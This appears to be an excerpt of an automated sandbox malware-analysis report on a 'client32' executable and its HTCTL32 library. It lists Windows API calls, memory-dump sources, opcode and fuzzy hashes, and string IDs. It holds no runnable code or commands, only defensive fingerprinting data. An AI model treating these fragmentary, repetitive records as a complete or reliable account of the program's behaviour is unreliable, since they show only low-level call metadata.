                                                                                                                        • Associated: 00000007.00000002.3640226374.00000000111F2000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640226374.00000000111FC000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640226374.0000000011222000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640226374.0000000011229000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640226374.000000001123D000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640226374.000000001124C000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640226374.0000000011250000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640226374.0000000011252000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640226374.000000001127E000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640226374.000000001135E000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640226374.0000000011360000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_7_2_11000000_client32.jbxd
                                                                                                                        Yara matches
                                                                                                                        Similarity
                                                                                                                        • API ID: CriticalSection$Enter_free$CloseControlCreateDecrementDeviceErrorEventHandleHeaderInterlockedLastLeaveObjectSingleUnprepareWaitwave
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 705253285-0
                                                                                                                        • Opcode ID: 2ffaf857092779b4cc8c6dc948aa08485a8b39598cc2e1fcd4f28cf9cf4d7f7e
                                                                                                                        • Instruction ID: ec5bb7023ba9694b1826725806baee6a54caa52fbc33dd5691a93a0cc33b1c6d
                                                                                                                        • Opcode Fuzzy Hash: 2ffaf857092779b4cc8c6dc948aa08485a8b39598cc2e1fcd4f28cf9cf4d7f7e
                                                                                                                        • Instruction Fuzzy Hash: C111C27A900B16ABE311CF60CC88BEFB7ECAF48358F004919FA2692141D370B540CB61
                                                                                                                        APIs
                                                                                                                        • _memset.LIBCMT ref: 1101D35E
                                                                                                                        • LoadIconA.USER32(00000000,0000139A), ref: 1101D3AF
                                                                                                                        • LoadCursorA.USER32(00000000,00007F00), ref: 1101D3BF
                                                                                                                        • RegisterClassExA.USER32(00000030), ref: 1101D3E1
                                                                                                                        • GetLastError.KERNEL32 ref: 1101D3E7
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000007.00000002.3640034517.0000000011001000.00000020.00000001.01000000.0000000B.sdmp, Offset: 11000000, based on PE: true
                                                                                                                        • Associated: 00000007.00000002.3640012267.0000000011000000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640137629.000000001118F000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640176357.00000000111DD000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640204910.00000000111EC000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640226374.00000000111F2000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640226374.00000000111FC000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640226374.0000000011222000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640226374.0000000011229000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640226374.000000001123D000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640226374.000000001124C000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640226374.0000000011250000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640226374.0000000011252000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640226374.000000001127E000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640226374.000000001135E000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640226374.0000000011360000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_7_2_11000000_client32.jbxd
                                                                                                                        Yara matches
                                                                                                                        Similarity
                                                                                                                        • API ID: Load$ClassCursorErrorIconLastRegister_memset
                                                                                                                        • String ID: 0
                                                                                                                        • API String ID: 430917334-4108050209
                                                                                                                        • Opcode ID: 197adc6d2d185478f28bbd981e4be0813fa150b943be2939de94797b805e9323
                                                                                                                        • Instruction ID: 2890e39c8948161dcf3a4c2706354c0f925fee5346d150246dd1548a136c71b7
                                                                                                                        • Opcode Fuzzy Hash: 197adc6d2d185478f28bbd981e4be0813fa150b943be2939de94797b805e9323
                                                                                                                        • Instruction Fuzzy Hash: D0018074D0131AABDB00EFE0C859B9DFBB4AB04308F508529F614BA284E7B511048B96
                                                                                                                        APIs
                                                                                                                        • LoadMenuA.USER32(00000000,00002EFD), ref: 1100334D
                                                                                                                        • GetSubMenu.USER32(00000000,00000000), ref: 11003373
                                                                                                                        • DestroyMenu.USER32(00000000), ref: 110033A2
                                                                                                                          • Part of subcall function 110290F0: GetLastError.KERNEL32(?,?), ref: 1102910C
                                                                                                                          • Part of subcall function 110290F0: wsprintfA.USER32 ref: 11029157
                                                                                                                          • Part of subcall function 110290F0: MessageBoxA.USER32(00000000,?,Client32,00000000), ref: 11029193
                                                                                                                          • Part of subcall function 110290F0: ExitProcess.KERNEL32 ref: 110291A9
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000007.00000002.3640034517.0000000011001000.00000020.00000001.01000000.0000000B.sdmp, Offset: 11000000, based on PE: true
                                                                                                                        • Associated: 00000007.00000002.3640012267.0000000011000000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640137629.000000001118F000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640176357.00000000111DD000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640204910.00000000111EC000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640226374.00000000111F2000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640226374.00000000111FC000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640226374.0000000011222000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640226374.0000000011229000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640226374.000000001123D000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640226374.000000001124C000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640226374.0000000011250000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640226374.0000000011252000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640226374.000000001127E000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640226374.000000001135E000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640226374.0000000011360000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_7_2_11000000_client32.jbxd
                                                                                                                        Yara matches
                                                                                                                        Similarity
                                                                                                                        • API ID: Menu$DestroyErrorExitLastLoadMessageProcesswsprintf
                                                                                                                        • String ID: ..\CTL32\annotate.cpp$hMenu$hSub
                                                                                                                        • API String ID: 468487828-934300333
                                                                                                                        • Opcode ID: b6ebe3cb19516443c737b85c4bf5343541eb5ddabd7932daa3618922ae928d72
                                                                                                                        • Instruction ID: 58cfccb6135285d2752e7502dd052a47240bf2dd06342519f2e5277968a08211
                                                                                                                        • Opcode Fuzzy Hash: b6ebe3cb19516443c737b85c4bf5343541eb5ddabd7932daa3618922ae928d72
                                                                                                                        • Instruction Fuzzy Hash: 79F05C3EF0062663C22352263C49F4FB7684BC1AB8F110071F910FA744FE11A00041FA
                                                                                                                        APIs
                                                                                                                        • __getptd.LIBCMT ref: 685B7A20
                                                                                                                          • Part of subcall function 685B6F64: __getptd_noexit.LIBCMT ref: 685B6F67
                                                                                                                          • Part of subcall function 685B6F64: __amsg_exit.LIBCMT ref: 685B6F74
                                                                                                                        • __calloc_crt.LIBCMT ref: 685B7A2B
                                                                                                                          • Part of subcall function 685BD3F5: Sleep.KERNEL32(00000000,685B6F16,00000001,00000214), ref: 685BD41D
                                                                                                                        • __lock.LIBCMT ref: 685B7A61
                                                                                                                        • ___addlocaleref.LIBCMT ref: 685B7A6D
                                                                                                                        • __lock.LIBCMT ref: 685B7A81
                                                                                                                        • InterlockedIncrement.KERNEL32(?), ref: 685B7A91
                                                                                                                          • Part of subcall function 685B60F9: __getptd_noexit.LIBCMT ref: 685B60F9
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000007.00000002.3640531103.0000000068591000.00000020.00000001.01000000.0000000F.sdmp, Offset: 68590000, based on PE: true
                                                                                                                        • Associated: 00000007.00000002.3640512023.0000000068590000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640564264.00000000685D0000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640584209.00000000685D9000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640610273.00000000685DA000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640610273.00000000685DE000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640651811.00000000685E0000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_7_2_68590000_client32.jbxd
                                                                                                                        Yara matches
                                                                                                                        Similarity
                                                                                                                        • API ID: __getptd_noexit__lock$IncrementInterlockedSleep___addlocaleref__amsg_exit__calloc_crt__getptd
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 3803058747-0
                                                                                                                        • Opcode ID: 2cabe3ea8e7a6e37f275171f7c8f9dfe4839d8e7bc315f8413378a48e5cdbabe
                                                                                                                        • Instruction ID: 085f5661b6385bf110cceee59c173f91d50daba2b60702536ce4614492e2f9f8
                                                                                                                        • Opcode Fuzzy Hash: 2cabe3ea8e7a6e37f275171f7c8f9dfe4839d8e7bc315f8413378a48e5cdbabe
                                                                                                                        • Instruction Fuzzy Hash: 8F01D43E504B01EFE710AFB4D82176D77F0AFA0728FA08109E954972C0DF754D408B51
                                                                                                                        APIs
                                                                                                                          • Part of subcall function 685ADBD0: _malloc.LIBCMT ref: 685ADBE9
                                                                                                                          • Part of subcall function 685ADBD0: wsprintfA.USER32 ref: 685ADC04
                                                                                                                          • Part of subcall function 685ADBD0: _memset.LIBCMT ref: 685ADC27
                                                                                                                        • std::exception::exception.LIBCMT ref: 685A0D9C
                                                                                                                        • __CxxThrowException@8.LIBCMT ref: 685A0DB1
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000007.00000002.3640531103.0000000068591000.00000020.00000001.01000000.0000000F.sdmp, Offset: 68590000, based on PE: true
                                                                                                                        • Associated: 00000007.00000002.3640512023.0000000068590000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640564264.00000000685D0000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640584209.00000000685D9000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640610273.00000000685DA000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640610273.00000000685DE000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640651811.00000000685E0000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_7_2_68590000_client32.jbxd
                                                                                                                        Yara matches
                                                                                                                        Similarity
                                                                                                                        • API ID: Exception@8Throw_malloc_memsetstd::exception::exceptionwsprintf
                                                                                                                        • String ID: 0f]h$DATA$NAME
                                                                                                                        • API String ID: 1338273076-3530225338
                                                                                                                        • Opcode ID: c8414d9bac56906cb2c88c3334b72434370d89c2a7457bd78270e80646d59f77
                                                                                                                        • Instruction ID: a9b0baae23d3308eb06caedf04afcfb8df62df33e001cf420b7242ecceca758c
                                                                                                                        • Opcode Fuzzy Hash: c8414d9bac56906cb2c88c3334b72434370d89c2a7457bd78270e80646d59f77
                                                                                                                        • Instruction Fuzzy Hash: 0941E7B5D00259AFDF54DFE9D880AEEFBB4FB48204F90452EE826A7240E7345A45CB91
                                                                                                                        APIs
                                                                                                                          • Part of subcall function 685ADBD0: _malloc.LIBCMT ref: 685ADBE9
                                                                                                                          • Part of subcall function 685ADBD0: wsprintfA.USER32 ref: 685ADC04
                                                                                                                          • Part of subcall function 685ADBD0: _memset.LIBCMT ref: 685ADC27
                                                                                                                        • std::exception::exception.LIBCMT ref: 685A0BA3
                                                                                                                        • __CxxThrowException@8.LIBCMT ref: 685A0BB8
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000007.00000002.3640531103.0000000068591000.00000020.00000001.01000000.0000000F.sdmp, Offset: 68590000, based on PE: true
                                                                                                                        • Associated: 00000007.00000002.3640512023.0000000068590000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640564264.00000000685D0000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640584209.00000000685D9000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640610273.00000000685DA000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640610273.00000000685DE000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640651811.00000000685E0000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_7_2_68590000_client32.jbxd
                                                                                                                        Yara matches
                                                                                                                        Similarity
                                                                                                                        • API ID: Exception@8Throw_malloc_memsetstd::exception::exceptionwsprintf
                                                                                                                        • String ID: 0f]h
                                                                                                                        • API String ID: 1338273076-3511245404
                                                                                                                        • Opcode ID: 04d1541900574d8fef642bd8c8ea5aac7357125da8a7e2915ebf19d126374f36
                                                                                                                        • Instruction ID: 91ba79fc904edd45493b82d58066234a224ddab79a7039eab3bbb8d4ce635a88
                                                                                                                        • Opcode Fuzzy Hash: 04d1541900574d8fef642bd8c8ea5aac7357125da8a7e2915ebf19d126374f36
                                                                                                                        • Instruction Fuzzy Hash: FB3150B5900609AFCB24DF99C8819AFFBF8FF98610F50852FE95597700E774A904CBA1
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000007.00000002.3640531103.0000000068591000.00000020.00000001.01000000.0000000F.sdmp, Offset: 68590000, based on PE: true
                                                                                                                        • Associated: 00000007.00000002.3640512023.0000000068590000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640564264.00000000685D0000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640584209.00000000685D9000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640610273.00000000685DA000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640610273.00000000685DE000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640651811.00000000685E0000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_7_2_68590000_client32.jbxd
                                                                                                                        Yara matches
                                                                                                                        Similarity
                                                                                                                        • API ID: HandleModule
                                                                                                                        • String ID: %s: $HTCTL32
                                                                                                                        • API String ID: 4139908857-3797952780
                                                                                                                        • Opcode ID: 81cfda260cd4285072bee66aa340ee61eecc4beb05a340d95b717f92ed2af96d
                                                                                                                        • Instruction ID: 93d36c71d2152a6f8de771bf9612add401eb1e1f4c734955234d1b452d3a10de
                                                                                                                        • Opcode Fuzzy Hash: 81cfda260cd4285072bee66aa340ee61eecc4beb05a340d95b717f92ed2af96d
                                                                                                                        • Instruction Fuzzy Hash: CA41F334900149DBCF01DF68DC58AEE7BB8EF8A345F508699EC2997240EB319A49CF94
                                                                                                                        APIs
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000007.00000002.3640034517.0000000011001000.00000020.00000001.01000000.0000000B.sdmp, Offset: 11000000, based on PE: true
                                                                                                                        • Associated: 00000007.00000002.3640012267.0000000011000000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640137629.000000001118F000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640176357.00000000111DD000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640204910.00000000111EC000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640226374.00000000111F2000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640226374.00000000111FC000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640226374.0000000011222000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640226374.0000000011229000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640226374.000000001123D000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640226374.000000001124C000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640226374.0000000011250000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640226374.0000000011252000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640226374.000000001127E000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640226374.000000001135E000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640226374.0000000011360000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_7_2_11000000_client32.jbxd
                                                                                                                        Yara matches
                                                                                                                        Similarity
                                                                                                                        • API ID: _strncpy$wsprintf
                                                                                                                        • String ID: %s (%s)
                                                                                                                        • API String ID: 2895084632-1363028141
                                                                                                                        • Opcode ID: 41cf12a399e40223a309384de66e6f5f00fee422c91aa36a5002e1312780ba24
                                                                                                                        • Instruction ID: 6d4a293539ff99ff9d91cd4089b7baa119477a06ea1ce5901e9509b66a7a6bff
                                                                                                                        • Opcode Fuzzy Hash: 41cf12a399e40223a309384de66e6f5f00fee422c91aa36a5002e1312780ba24
                                                                                                                        • Instruction Fuzzy Hash: 4731F374E143469FEB11CF24DCC4BA7BBE8AF85309F004968E9458B382E7B4E514CBA1
                                                                                                                        APIs
                                                                                                                          • Part of subcall function 685ADBD0: _malloc.LIBCMT ref: 685ADBE9
                                                                                                                          • Part of subcall function 685ADBD0: wsprintfA.USER32 ref: 685ADC04
                                                                                                                          • Part of subcall function 685ADBD0: _memset.LIBCMT ref: 685ADC27
                                                                                                                        • std::exception::exception.LIBCMT ref: 6859CCCD
                                                                                                                        • __CxxThrowException@8.LIBCMT ref: 6859CCE2
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000007.00000002.3640531103.0000000068591000.00000020.00000001.01000000.0000000F.sdmp, Offset: 68590000, based on PE: true
                                                                                                                        • Associated: 00000007.00000002.3640512023.0000000068590000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640564264.00000000685D0000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640584209.00000000685D9000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640610273.00000000685DA000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640610273.00000000685DE000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640651811.00000000685E0000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_7_2_68590000_client32.jbxd
                                                                                                                        Yara matches
                                                                                                                        Similarity
                                                                                                                        • API ID: Exception@8Throw_malloc_memsetstd::exception::exceptionwsprintf
                                                                                                                        • String ID: 0f]h
                                                                                                                        • API String ID: 1338273076-3511245404
                                                                                                                        • Opcode ID: 8be444808bada0c714d03c237ed716dd54982ca79bb08060f51936bebbda16a0
                                                                                                                        • Instruction ID: 87b8a1e276a08f7ef116c12cee3da467b27eeddadd71f34df064a9b0f14749b1
                                                                                                                        • Opcode Fuzzy Hash: 8be444808bada0c714d03c237ed716dd54982ca79bb08060f51936bebbda16a0
                                                                                                                        • Instruction Fuzzy Hash: 86314F749007089F8728DF58D5818ABF7F8FF98210B54896ED85A97720E730ED00CBD1
                                                                                                                        APIs
                                                                                                                        • RegQueryValueExA.ADVAPI32(?,?,00000000,?,?,?,00000000,00000000,75C04C70), ref: 110EB1B1
                                                                                                                        • _free.LIBCMT ref: 110EB1CC
                                                                                                                          • Part of subcall function 1115F3B5: HeapFree.KERNEL32(00000000,00000000,?,11167F76,00000000,?,110B7069), ref: 1115F3CB
                                                                                                                          • Part of subcall function 1115F3B5: GetLastError.KERNEL32(00000000,?,11167F76,00000000,?,110B7069), ref: 1115F3DD
                                                                                                                        • RegQueryValueExA.ADVAPI32(000007FF,?,00000000,?,00000000,000007FF), ref: 110EB20A
                                                                                                                        • _free.LIBCMT ref: 110EB293
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000007.00000002.3640034517.0000000011001000.00000020.00000001.01000000.0000000B.sdmp, Offset: 11000000, based on PE: true
                                                                                                                        • Associated: 00000007.00000002.3640012267.0000000011000000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640137629.000000001118F000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640176357.00000000111DD000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640204910.00000000111EC000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640226374.00000000111F2000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640226374.00000000111FC000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640226374.0000000011222000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640226374.0000000011229000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640226374.000000001123D000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640226374.000000001124C000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640226374.0000000011250000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640226374.0000000011252000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640226374.000000001127E000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640226374.000000001135E000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640226374.0000000011360000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_7_2_11000000_client32.jbxd
                                                                                                                        Yara matches
                                                                                                                        Similarity
                                                                                                                        • API ID: QueryValue_free$ErrorFreeHeapLast
                                                                                                                        • String ID: Error %d getting %s
                                                                                                                        • API String ID: 3888477750-2709163689
                                                                                                                        • Opcode ID: 92455008d62525dafcdf8e23666724c203daf775c03ee8a075b6d364e35e82c3
                                                                                                                        • Instruction ID: 4c35e499aaf5ad9a009ae928ade364ef1dd2f983720d507f3f6301ea2f5437f7
                                                                                                                        • Opcode Fuzzy Hash: 92455008d62525dafcdf8e23666724c203daf775c03ee8a075b6d364e35e82c3
                                                                                                                        • Instruction Fuzzy Hash: FA316175D001299FDB90DA55CC84BAEB7F9AF45304F05C0E9E959A7240DE306E85CFE1
                                                                                                                        APIs
                                                                                                                        • EnterCriticalSection.KERNEL32(?,89DA8021), ref: 685AFB04
                                                                                                                        • std::_Xinvalid_argument.LIBCPMT ref: 685AFB3E
                                                                                                                        • SetEvent.KERNEL32(?), ref: 685AFB69
                                                                                                                        • LeaveCriticalSection.KERNEL32(00000000,00000000), ref: 685AFBA4
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000007.00000002.3640531103.0000000068591000.00000020.00000001.01000000.0000000F.sdmp, Offset: 68590000, based on PE: true
                                                                                                                        • Associated: 00000007.00000002.3640512023.0000000068590000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640564264.00000000685D0000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640584209.00000000685D9000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640610273.00000000685DA000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640610273.00000000685DE000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640651811.00000000685E0000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_7_2_68590000_client32.jbxd
                                                                                                                        Yara matches
                                                                                                                        Similarity
                                                                                                                        • API ID: CriticalSection$EnterEventLeaveXinvalid_argumentstd::_
                                                                                                                        • String ID: list<T> too long
                                                                                                                        • API String ID: 930337060-4027344264
                                                                                                                        • Opcode ID: aa89eb3ca2bfef3fb1eb9fd79b341c041c0c35b45fd8066fa600a09c4aebbde8
                                                                                                                        • Instruction ID: 3d13b4f10331d86cf535298b047c216756b78bb4b72ac2e256affd3daeb9b0f1
                                                                                                                        • Opcode Fuzzy Hash: aa89eb3ca2bfef3fb1eb9fd79b341c041c0c35b45fd8066fa600a09c4aebbde8
                                                                                                                        • Instruction Fuzzy Hash: 0A316175604608AFC714CF68C894AAEBBF8FB49310F508A1DE85A97784D770E900CB64
                                                                                                                        APIs
                                                                                                                          • Part of subcall function 685A7D00: __vswprintf.LIBCMT ref: 685A7D26
                                                                                                                          • Part of subcall function 68595060: _free.LIBCMT ref: 6859506A
                                                                                                                          • Part of subcall function 68595060: _malloc.LIBCMT ref: 68595090
                                                                                                                        • _free.LIBCMT ref: 6859BB46
                                                                                                                          • Part of subcall function 685B1BFD: HeapFree.KERNEL32(00000000,00000000), ref: 685B1C13
                                                                                                                          • Part of subcall function 685B1BFD: GetLastError.KERNEL32(00000000), ref: 685B1C25
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000007.00000002.3640531103.0000000068591000.00000020.00000001.01000000.0000000F.sdmp, Offset: 68590000, based on PE: true
                                                                                                                        • Associated: 00000007.00000002.3640512023.0000000068590000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640564264.00000000685D0000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640584209.00000000685D9000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640610273.00000000685DA000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640610273.00000000685DE000.00000004.00000001.01000000.0000000F.sdmpDownload File
